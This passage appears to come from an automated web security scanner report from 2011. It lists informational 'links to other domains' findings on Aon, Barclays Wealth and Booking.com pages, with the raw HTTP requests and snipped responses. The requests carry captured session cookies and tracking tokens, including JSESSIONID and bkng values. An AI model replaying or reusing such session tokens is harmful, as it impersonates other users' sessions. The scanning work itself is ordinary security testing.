Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:01:43 GMT
Content-Length: 83533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<li class="sub"><a href="http://www.aon-esolutions.com" target="_blank">Aon RiskConsole</a>
...[SNIP]...
<li class="sub"><a href="http://www.aon-esolutions.com" target="_blank">Aon SafetyLogic</a>
...[SNIP]...
<li class="sub"><a href="http://www.aon-esolutions.com" target="_blank">iVOS</a>
...[SNIP]...
<li class="sub"><a href="http://www.inpoint.com" target="_blank">Inpoint</a>
...[SNIP]...
<li><a href="http://www.aon-esolutions.com" target="_blank">Aon RiskConsole</a>
...[SNIP]...
<li><a href="http://www.aon-esolutions.com" target="_blank">Aon SafetyLogic</a>
...[SNIP]...
<li><a href="http://www.inpoint.com" target="_blank">Inpoint</a>
...[SNIP]...
<li><a href="http://www.aon-esolutions.com" target="_blank">iVOS</a>
...[SNIP]...
<li><a href="http://aon.mediaroom.com/">Media Room</a>
...[SNIP]...
<!-- Footer Images -->
   
       
               <a href="http://www.facebook.com/group.php?gid=19094177616" target='_blank'><img src="/siteImages/social_media_icons/facebook.jpg" alt="Facebook" /></a>
       
   
                       <a href="http://www.twitter.com/AonCorp"><img src="/siteImages/social_media_icons/twitter.jpg" alt="Twitter" /></a>
       
   
                       <a href="http://www.linkedin.com/company/2041" target='_blank'><img src="/siteImages/social_media_icons/linkedin.jpg" alt="LinkedIn" />
...[SNIP]...

19.177. http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclayswealth.com
Path:   /international/foreign-exchange-affiliates.htm

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711 HTTP/1.1
Host: www.barclayswealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
content-type: text/html
date: Sun, 02 Oct 2011 23:58:03 GMT
etag: W/"b711-4e8319e9"
last-modified: Wed, 28 Sep 2011 12:58:17 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
vary: accept-encoding
cache-control: public,max-age=3600
Content-Length: 46865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<head>
...[SNIP]...
<li>
<a href="http://www.stockbrokers.barclays.co.uk/barx/loginToBARX.htm">BARXdirect</a>
...[SNIP]...
<li>
<a href="https://www.stockbrokers.barclays.co.uk/idv/Login1.asp?category=home&amp;usecase=login&amp;popup=&amp;">Barclays Stockbrokers</a>
...[SNIP]...
<li>
<a href="https://www.gerrard.com/clientcentre/login.aspx">Gerrard Client Centre</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.hk/onlinebanking">Hong Kong Online Banking</a>
...[SNIP]...
<li>
<a title="Singapore Wealth Online Banking" href="https://www.barclayswealth.sg/onlinebanking/">Singapore Online Banking</a>
...[SNIP]...
<li>
<a href="https://ecommerce.barcap.com/trader/efxdealer/">e-FX Dealer</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.hk/onlinebanking">Hong Kong Online Banking</a>
...[SNIP]...
<li>
<a title="Singapore Wealth Online Banking" href="https://www.barclayswealth.sg/onlinebanking/">Singapore Online Banking</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.ch/onlinebanking/">Switzerland Online Banking</a>
...[SNIP]...
<!-- Advertiser 'UK Barclays Wealth c/o Sapient UK', Include user in segment 'Barclays Wealth Test Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY --> <img src="http://ad.yieldmanager.com/pixel?id=1020665&amp;t=2" width="1" height="1" /> <!-- End of segment tag --> <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1054619413/?label=uM-qCK-Q2gEQle7w9gM&amp;guid=ON&amp;script=0" /> <!-- Advertiser 'UK Barclays Wealth c/o Sapient UK', Conversion tracking 'Barclays_Wealth_News Letter Signup' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=945912&amp;t=2" width="1" height="1" /> <!-- End of conversion tag -->
...[SNIP]...
<p>
<a title="Apply now" href="https://applyinternational.barclays.com/op/getting-started.html?{RDhref+}t=1302004293"><img src="/Images/bwi_btn_apply_now_white.png" />
...[SNIP]...
<p>
<a title="Apply now" href="https://applyinternational.barclays.com/op/getting-started.html?{RDhref+}t=1302004293"><img src="/Images/bwi_btn_apply_now_white.png" />
...[SNIP]...
<li>
<a title="The basics of FX [video opens in a new window]" onclick="window.open (this.href, &#39;child&#39;); return false" href="http://video.streamlevel.com/barclays/video1_start.html">The basics of foreign exchange</a>
...[SNIP]...
<li>
<a title="I want to buy a house in another currency [video opens in a new window]" onclick="window.open (this.href, &#39;child&#39;); return false" href="http://video.streamlevel.com/barclays/video2_start.html">I want to buy a house in another currency</a>
...[SNIP]...
<p>
<a title="Apply now" href="https://applyinternational.barclays.com/op/getting-started.html?{RDhref+}t=1302004293"><img src="/Images/bwi_btn_apply_now_white.png" />
...[SNIP]...
<div>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcs0sd6z700000cpbndecaa4f_6n9k/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2" />
</div>
...[SNIP]...

19.178. http://www.barclayswealth.com/international/i-alert.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclayswealth.com
Path:   /international/i-alert.htm

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click HTTP/1.1
Host: www.barclayswealth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.barclayswealth.com/Images/iAlert-Q32011_567x140.SWF
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD_STATEFUL_f8c38b02-59b3-11de-be40-001a64b96864=%2F; BIGipServerwpl_GRN_TEST3_static_http_pool=1948654764.14535.0000; sifrFetch=true; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317619786708:ss=1317617886010; __utma=1.1111853373.1317599886.1317599886.1317599886.1; __utmb=1.13.10.1317599886; __utmc=1; __utmz=1.1317599886.1.1.utmcsr=cdn.flashtalking.com|utmccn=(referral)|utmcmd=referral|utmcct=/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf; __utma=1.1111853373.1317599886.1317599886.1317599886.1; __utmb=1.14.10.1317599886; __utmc=1; __utmz=1.1317599886.1.1.utmcsr=cdn.flashtalking.com|utmccn=(referral)|utmcmd=referral|utmcct=/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 03 Oct 2011 00:31:31 GMT
etag: W/"954f-4e79af98"
last-modified: Wed, 21 Sep 2011 09:34:16 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
vary: accept-encoding
cache-control: public,max-age=3600
Content-Length: 38223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<head>
...[SNIP]...
<li>
<a href="http://www.stockbrokers.barclays.co.uk/barx/loginToBARX.htm">BARXdirect</a>
...[SNIP]...
<li>
<a href="https://www.stockbrokers.barclays.co.uk/idv/Login1.asp?category=home&amp;usecase=login&amp;popup=&amp;">Barclays Stockbrokers</a>
...[SNIP]...
<li>
<a href="https://www.gerrard.com/clientcentre/login.aspx">Gerrard Client Centre</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.hk/onlinebanking">Hong Kong Online Banking</a>
...[SNIP]...
<li>
<a title="Singapore Wealth Online Banking" href="https://www.barclayswealth.sg/onlinebanking/">Singapore Online Banking</a>
...[SNIP]...
<li>
<a href="https://ecommerce.barcap.com/trader/efxdealer/">e-FX Dealer</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.hk/onlinebanking">Hong Kong Online Banking</a>
...[SNIP]...
<li>
<a title="Singapore Wealth Online Banking" href="https://www.barclayswealth.sg/onlinebanking/">Singapore Online Banking</a>
...[SNIP]...
<li>
<a href="https://www.barclayswealth.ch/onlinebanking/">Switzerland Online Banking</a>
...[SNIP]...
<!-- Advertiser 'UK Barclays Wealth c/o Sapient UK', Include user in segment 'Barclays Wealth Test Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY --><img src="http://ad.yieldmanager.com/pixel?id=1020665&amp;t=2" width="1" height="1" /> <!-- End of segment tag --> <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1054619413/?label=uM-qCK-Q2gEQle7w9gM&amp;guid=ON&amp;script=0" /> <!-- Advertiser 'UK Barclays Wealth c/o Sapient UK', Conversion tracking 'Barclays_Wealth_News Letter Signup' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=945912&amp;t=2" width="1" height="1" /> <!-- End of conversion tag -->
...[SNIP]...
<p>
If you are not a Barclays Wealth International client yet, you can <a title="Sign up for a free 60 day trial of iAlert" href="https://secure.barclays.co.uk/international/ialert/bwiwebsite">sign up for a free 60 day trial of iAlert</a> and see how it could help you make more informed FX decisions. If you are already a client you can <a title="Sign up today" href="https://secure.barclays.co.uk/international/ialert/bwiwebsite">sign up today</a>
...[SNIP]...
<p>
<a title="Sign up today" href="https://secure.barclays.co.uk/international/ialert/bwiwebsite"><strong>
...[SNIP]...
<p>
<a title="Call me back" href="https://secure.barclays.co.uk/internationalenquiry/?lead=ialert"><img src="/Images/bwi_btn_call_me_back.png" />
...[SNIP]...
<div>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcs0sd6z700000cpbndecaa4f_6n9k/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2" />
</div>
...[SNIP]...

19.179. http://www.booking.com/general.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /general.en-us.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/about HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.6.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=5.31764388084412

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:31:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG%2FpVqxxgeiiGa2Aij6eAdFCIoFktHJRCU7t6pG8eYurfp1mo97MaE6Xt3SQiUpot4wcm%2Ful3h2cCp3Aq3v9fFndje7J5kBuXpqwKFwzq1d8NFsqOMXkMLOh8MheA4SvhsDED1JW8Lzq1pPPuNWkLtLa2nYu4GrPir7OHtXIl44wyZZqW%2BoUI25Qt%2Bq%2FThnN11dNMvpllwZf%2BFUGaF0yEYQWfEUxqgLGBTcGCbPL2PoJSvzs3aJcz6peq6OJcz0X3v8XJzxlrl3Re%2B4fMPNVGOKw3OXRjD9BApu3kdB%2B4DfNedCdH7nvJIk8bHMsdAXvWaipTAaEEr77iSzcDzu0k4Pb0VGYDgJMguGhKAboI9qdT5%2FfoxQD1ZO10v0YKUwppRIyD0a3Ln9PUrxwZkhSSkHFlrAVjent8lv1qDG2xdp9lmPdV5vh3rRmuN1Lz0QN%2F3V2Sn9fPeJsHrK0pcgOYpSyW0n95GoFoyAkBhI17Phwo7yrvrjeDNHmxKMRkraR5MdqFJBuwCVd9dBvXoVyxW413W13jwOQsaHZx8iPdphluzMD5h3jwOEjlDkBpFkAF0kJZnoHDtUP3l1iRU%2FdEKfImnJ%2FQISsSKIW2wR5lSf%2F1SximqCADYBfEBvNs%2Bb4p%2BXQ0a42SQI1HuZMn7XZ3eadU1vaR0aacQEhT%2BTMbKt5QCA48TalbFf5k5egYBg9r%2B4N8uoiUgQQYx%2Ftt5AO9%2FVBRh7aJptr3L4saF02KTAh9Z0p5%2Fihhjlsn4hE28vhAsssqhO3O8S8giS%2BAD9yLu1raMti3QMcj0gfOfbUXo26HhPHD3cS56Ly4PlQzJm6UrwqCaLpO7KTYRTBFNfjq%2FicOkR6pMNZ1%2FC%2Fc0eZGJAjprFnEfcz%2Ff1D2udPGhpbVYLpVeRCyKbNt53ggYIGQr1TTkJ7xhSCCOCzTUXuE6dUGpUiWBZ7%2F3AHIMw6FvtaQBTat%2FQXE6ame41kAL%2B6V00yN0Xmopzv5yDpjigEcOO5oIMkGwsHdniwwtzhwSITaOyh2%2FKP0tbPU%2FCeKxA16ayEzJ5YKOenV4WVCjaYstXg3Le9A%2B%2BgxuR7X2ojY6dDXatodt%2F5RDf3maagBIdR6Oc6ZIKCZVYQTZjElDDZ8cp%2FgiTlLo6jDqUUyssnkr6X3M%2FAjD%2BrZNH8IuQKQM72Zu1cjPHJxdgPqO%2BOs%2F7rRh9o%2FTf5CKOGhXuc0PdC22WNwtICZpDHs8KyH%2F%2FopDWQBPuGzYzztul5MGNxkOl4zCU0jr3252eba8xA1Mw3aePG1Sf%2F8UQEgao7bg13Co2dpibytVWXIz1SXqF3vHV2vONIMhbOr0HejT8ddOxSgNDag0VIm1OAYgAbMxdRRA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59658
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/general.en.html?tmpl=docs/about" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<!--[if lte IE 8]>
...[SNIP]...
<!-- css -->

<link rel="stylesheet" type="text/css" href="http://r.bstatic.com/static/css/static.1191.css" />

<!-- /css -->
...[SNIP]...
<a href="http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101" title="Booking.com" style="text-decoration: none;">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel now!" />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


</a>
...[SNIP]...
<h4><a href="http://www5jh.openhire.com/epostings/submit.cfm?version=1&company_id=1006" target="_blank" id="jobsite">Career Opportunities</a>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />The Company</span>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />The Team</span>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />Our Vision</span>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />Benefits for customers</span>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />Benefits for hoteliers</span>
...[SNIP]...
<p>For further information and to sign up, please see our <a href="https://admin.bookings.org/hotelreg" target="_blank">Hotel Partner Program</a>
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...

19.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74mwWA2qRP9ibjLlGSkGnixIN53jQSEFpZ%2Btt%2FEJbWxCwnNo9PFCYgujcC5zr%2FNnG2SXj%2FlwkxJh0Rlt6OoCAfAXC3G1Glp4pwRM49T3YD64Tefl5B%2BA6FojZRWNPqfRuwCMgCSmHsFJeZKeepvzYPcawzb3ElmfM8U3kB%2B0xUq4ewe4gLbFQ0okcCs2oila3oQmChJIOFelhvhIn3j4XqTiKyB%2BzNUZJLBDJC9FMQQsn%2F99mmnY3TlC%2FB6EQg2nU50Pd4t5idoU7FR6PL8ulD098rM8qIHr2I0DBfTZZ1JTx2qAEhooN7rqEfROrFcBxEYba%2FtDUB7St7FdNyKXMz4h1eh9eWzHmGeQIFzoBcbrv7%2FOlyH18uHrrwywNNBs%2B6CPYsZxHSrLNYNkA3p54cJwVJJtADgBE9vkTKuoaRbmXXXYcQ86rDIbGJUCDA2j0x8fpuMDPY2mQ%2BCdx%2FNusXDhxf%2BA0ZMhno3cUHHRqbWpereTJlY2vVu5h1Y2q7Cfi6ApwJWDv%2BfuO98fIM%2Fhu%2FX%2B0SLvl%2B%2Fjx1LGZc1US2Gz1ZieDavXXvciTa6rXmIm2%2FdKvW7s4q2AwZtOX30qxBGshCyJgjKtgjiMCxDyxFVdf7EcVq4JTOguZfxVqHRR%2B%2Fcy%2BSAsTRg9zqx%2FtST2kRIticJJiOXs6ArJfMau9s79Jc%2FA8jvUPg%2F2bBTHy7Yjm1PE3illu56a6dgj0n1%2Fyb0UCfVwE5jRsU%2BKkT7s7cUmVhAVhZ9usxmGKlwYdTA2rY%2FaI9lxsClMjpiDXHCWmXJc2FaVspfJMjtvDmIanyPF9zgnyRRAeWeq73NdAIQVD9Zkcn0w3u78GbuMZtBlzzxK9usz%2BTZzzq0pw5svZbpRvL0MkGkwvD7cMgq0i%2F6a1NX3K1Ch4yWCS%2BHLRvlcSHdTUywk0u%2B0xmqD2%2Bxg8uxhsE1%2FdvBw93mjrIZu5AP3L4MmqoA9edCGGVPgqIJBf01YcyckRX0%2F0cTNB3u%2Bl5Ype%2FywAfb%2Fa8awDp9BWNKgj%2B6EqGsglDnmUWQN3JweXVWhgzBOpzywYIa2d4nWm0alm9aDppC34Dcx8P7tuThuOduYpc1bkAp%2FVnuVGE9T8ESzu%2B9adrUWruCp%2BLpAUvAIiGYGNFTgEAiQCQ8xz2aIjBa1urHpuk2GZtYTUi4j5ROFYT4DXZ1IAVCPuvuTFnqiS2HnjKi4xJXmNmkg8rBg9xWoDZ%